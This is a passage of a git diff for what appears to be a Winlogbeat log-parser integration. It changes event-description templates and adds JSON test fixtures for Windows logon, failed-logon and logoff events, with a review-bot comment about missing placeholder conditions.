{host.hostname}: {event.original}", "conditions": [ { "field": "winlog.provider_guid", - "value": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" - }, + "value": "{555908d1-a6d7-4695-8e1e-26931d2012f4}" + } + ] + }, + { + "value": "Sysmon {winlog.opcode} event on {winlog.computer_name}", + "conditions": [ { - "field": "event.action" - }, + "field": "winlog.provider_guid", + "value": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" + } + ] + }, + 
{ + "value": "Sysmon : no event on {winlog.computer_name}", + "conditions": [ { - "field": "winlog.computer_name" + "field": "winlog.provider_guid", + "value": "{00000000-0000-0000-0000-000000000000}" + } + ] + }, + { + "value": "Security event : {event.action} on {winlog.computer_name}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" } ] }, @@ -117,12 +1735,6 @@ { "field": "event.module", "value": "powershell" - }, - { - "field": "event.action" - }, - { - "field": "winlog.computer_name" } ] }, diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json new file mode 100644 index 000000000..fe8a200a5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4624.json 
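Review bot: The rewritten `Service Control Manager on {host.hostname}: {event.original}` entry now matches on `winlog.provider_guid` alone, having dropped the `host.hostname` and `event.original` presence conditions, so it can be selected for events in which those fields are missing; the `security_event_4625.json` fixture added in this same commit has no `event.original` in its expected output, which shows the field is not guaranteed. The three new `Filtering connection` entries in this hunk keep a presence condition for every placeholder they interpolate, so the consistent fix is to keep `{ "field": "event.original" }` in that entry and `{ "field": "event.action" }` in the `Security event : {event.action} on {winlog.computer_name}` entry. How the description engine renders a missing placeholder is not visible in this diff, so the user-facing impact is inferred. The enclosing JSON array starts and ends outside this hunk.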
@@ -0,0 +1,145 @@ +{ + "input": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4624", + "kind": "event", + "module": "security", + "original": "An account was successfully logged on.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tWS-USER-01$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nLogon Information:\n\tLogon Type:\t\t3\n\tRestricted Admin Mode:\t-\n\tVirtual Account:\t\tNo\n\tElevated Token:\t\tNo\n\nImpersonation Level:\t\tImpersonation\n\nNew Logon:\n\tSecurity ID:\t\tS-4-5-6\n\tAccount Name:\t\ttarget_user\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0xFCEBB74A\n\tLinked Logon ID:\t\t0x0\n\tNetwork Account Name:\t-\n\tNetwork Account Domain:\t-\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\n\nProcess Information:\n\tProcess ID:\t\t0x2f0\n\tProcess Name:\t\tC:\\Windows\\System32\\executable.exe\n\nNetwork Information:\n\tWorkstation Name:\tWS-USER-01\n\tSource Network Address:\t1.2.3.4\n\tSource Port:\t\t29051\n\nDetailed Authentication Information:\n\tLogon Process:\t\tProcess \n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\n\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\n\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\n\nThe network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases.\n\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.",
+ "type": [
+ "start"
+ ]
+ },
+ "@timestamp": "2024-11-12T08:41:05.803000Z",
+ "action": {
+ "id": 4624,
+ "outcome": "success",
+ "properties": {
+ "AuthenticationPackageName": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0",
+ "ElevatedToken": "%%1843",
+ "ImpersonationLevel": "%%1833",
+ "IpAddress": "1.2.3.4",
+ "IpPort": "29051",
+ "KeyLength": "0",
+ "LmPackageName": "-",
+ "LogonGuid": "{00000000-0000-0000-0000-000000000000}",
+ "LogonProcessName": "Process ",
+ "LogonType": "3",
+ "ProcessId": "0x2f0",
+ "ProcessName": "C:\\Windows\\System32\\executable.exe",
+ "RestrictedAdminMode": "-",
+ "SubjectDomainName": "DOMAIN",
+ "SubjectLogonId": "0x3e7",
+ "SubjectUserName": "WS-USER-01$",
+ "SubjectUserSid": "S-1-2-3",
+ "TargetDomainName": "DOMAIN",
+ "TargetLinkedLogonId": "0x0",
+ "TargetLogonId": "0xfcebb74a",
+ "TargetOutboundDomainName": "-",
+ "TargetOutboundUserName": "-",
+ "TargetUserName": "target_user",
+ "TargetUserSid": "S-4-5-6",
+ "TransmittedServices": "-",
+ "VirtualAccount": "%%1843",
+ "WorkstationName": "WS-USER-01"
+ }
+ },
+ "agent": {
+ "ephemeral_id": "12345678-1234-5678-9012-123456789012",
+ "id": "abcd1234-abcd-1234-ef56-abcdef123456",
+ "type": "winlogbeat",
+ "version": "7.0.0"
+ },
+ "client": {
+ "ip": "1.2.3.4"
+ },
+ "host": {
+ "architecture": "x86_64",
+ "hostname": "hostname",
+ "id": "abcdefab-1234-5678-9012-abcdefabcdef",
+ "name": "hostname",
+ "os": {
+ "build": "17763.6414",
+ "family": "windows",
+ "kernel": "10.0.17763.6414 (WinBuild.160101.0800)",
+ "name": "Windows Server 2019 Datacenter",
+ "platform": "windows",
+ "version": "10.0"
+ }
+ },
+ "log": {
+ "level": "information"
+ },
+ "related": {
+ "hosts": [
+ "hostname"
+ ]
+ },
+ "sekoiaio": {
+ "authentication": {
+ "process": {
+ "name": "Process "
+ }
+ },
+ "client": {
+ "name": "WS-USER-01",
+ "os": {
+ "type": "windows"
+ }
+ },
+ "server": {
+ "name": "hostname",
+ "os": {
+ "type": "windows"
+ }
+ }
+ },
+ "user": {
+ "id": "S-1-2-3",
+ "name": "WS-USER-01$",
+ "target": {
+ "domain": "DOMAIN",
+ "id": "S-4-5-6",
+ "name": "target_user"
+ }
+ },
+ "winlog": {
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "hostname.company.com",
+ "event_id": "4624",
+ "keywords": [
+ "Audit Success"
+ ],
+ "logon": {
+ "id": "0x3e7",
+ "type": "Network"
+ },
+ "opcode": "Info",
+ "process": {
+ "pid": 752,
+ "thread": {
+ "id": 7960
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "1170100815",
+ "task": "Logon",
+ "version": 2
+ }
+ }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json
new file mode 100644
index 000000000..85bda7ac7
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4625.json
@@ -0,0 +1,193 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostn
ame\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit 
Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" 
+ ],
+ "code": "4625",
+ "kind": "event",
+ "module": "security",
+ "outcome": "failure",
+ "provider": "Microsoft-Windows-Security-Auditing",
+ "reason": "user_not_exist",
+ "type": [
+ "start"
+ ]
+ },
+ "@timestamp": "2024-11-12T08:40:34.260000Z",
+ "action": {
+ "id": 4625,
+ "outcome": "failure",
+ "properties": {
+ "AuthenticationPackageName": "Kerberos",
+ "FailureReason": "%%2313",
+ "IpAddress": "-",
+ "IpPort": "-",
+ "KeyLength": "0",
+ "LmPackageName": "-",
+ "LogonProcessName": "Channel",
+ "LogonType": "3",
+ "ProcessId": "0x338",
+ "ProcessName": "C:\\Windows\\System32\\executable.exe",
+ "Status": "0xc000006d",
+ "SubStatus": "0xc0000064",
+ "SubjectDomainName": "J_DOE",
+ "SubjectLogonId": "0x3e7",
+ "SubjectUserName": "WORKSTATION$",
+ "SubjectUserSid": "S-1-2-3",
+ "TargetUserSid": "S-1-0-0",
+ "TransmittedServices": "-",
+ "WorkstationName": "WORKSTATION"
+ }
+ },
+ "agent": {
+ "ephemeral_id": "11111111-2222-3333-4444-555555555555",
+ "id": "12345678-abcd-ef90-1234-abcdef123456",
+ "name": "WORKSTATION",
+ "type": "filebeat",
+ "version": "8.14.1"
+ },
+ "host": {
+ "architecture": "x86_64",
+ "hostname": "hostname",
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+ "ip": [
+ "1.2.3.4",
+ "4.3.2.1",
+ "5.6.7.8",
+ "fe80::1111:2222:3333:4444",
+ "fe80::1234:5678:90ab:cde",
+ "fe80::1234:abcd:ef",
+ "fe80::a0b1:c2d:3e4",
+ "fe80::aaaa:bbbb:cccc:dddd",
+ "fe80::abcd:1234:567"
+ ],
+ "mac": [
+ "00-00-00-00-00-00-00-00",
+ "11-11-11-11-11-11",
+ "A0-B1-C2-D3-E4-F5",
+ "AA-BB-CC-DD-EE-FF"
+ ],
+ "name": "hostname",
+ "os": {
+ "build": "14393.7428",
+ "family": "windows",
+ "kernel": "10.0.14393.7426 (rs1_release.240926-1524)",
+ "name": "Windows Server 2016 Datacenter",
+ "platform": "windows",
+ "type": "windows",
+ "version": "10.0"
+ }
+ },
+ "log": {
+ "level": "information"
+ },
+ "process": {
+ "executable": "C:\\Windows\\System32\\executable.exe",
+ "name": "executable.exe",
+ "pid": 824
+ },
+ "related": {
+ "hosts": [
+ "WORKSTATION",
+ "hostname"
+ ],
+ "ip": [
+ "1.2.3.4",
+ "4.3.2.1",
+ "5.6.7.8",
+ "fe80::1111:2222:3333:4444",
+ "fe80::1234:5678:90ab:cde",
+ "fe80::1234:abcd:ef",
+ "fe80::a0b1:c2d:3e4",
+ "fe80::aaaa:bbbb:cccc:dddd",
+ "fe80::abcd:1234:567"
+ ]
+ },
+ "sekoiaio": {
+ "authentication": {
+ "process": {
+ "name": "Channel"
+ }
+ },
+ "client": {
+ "name": "WORKSTATION",
+ "os": {
+ "type": "windows"
+ }
+ },
+ "server": {
+ "name": "hostname",
+ "os": {
+ "type": "windows"
+ }
+ }
+ },
+ "server": {
+ "ip": [
+ "1.2.3.4",
+ "4.3.2.1",
+ "5.6.7.8",
+ "fe80::1111:2222:3333:4444",
+ "fe80::1234:5678:90ab:cde",
+ "fe80::1234:abcd:ef",
+ "fe80::a0b1:c2d:3e4",
+ "fe80::aaaa:bbbb:cccc:dddd",
+ "fe80::abcd:1234:567"
+ ]
+ },
+ "source": {
+ "address": "WORKSTATION",
+ "domain": "WORKSTATION",
+ "port": 0
+ },
+ "user": {
+ "id": "S-1-2-3",
+ "name": "WORKSTATION$",
+ "target": {
+ "id": "S-1-0-0"
+ }
+ },
+ "winlog": {
+ "activity_id": "{12345678-abcd-efab-cdef-123456789012}",
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "WORKSTATION.johndoe.com",
+ "event_id": "4625",
+ "keywords": [
+ "Audit Failure"
+ ],
+ "logon": {
+ "failure": {
+ "reason": "Unknown user name or bad password.",
+ "status": "This is either due to a bad username or authentication information",
+ "sub_status": "User logon with misspelled or bad user account"
+ },
+ "id": "0x3e7",
+ "type": "Network"
+ },
+ "opcode": "Info",
+ "process": {
+ "pid": 824,
+ "thread": {
+ "id": 28936
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "2552812283",
+ "task": "Logon"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json
new file mode 100644
index 000000000..035469c13
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4634.json
@@ -0,0 +1,112 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event 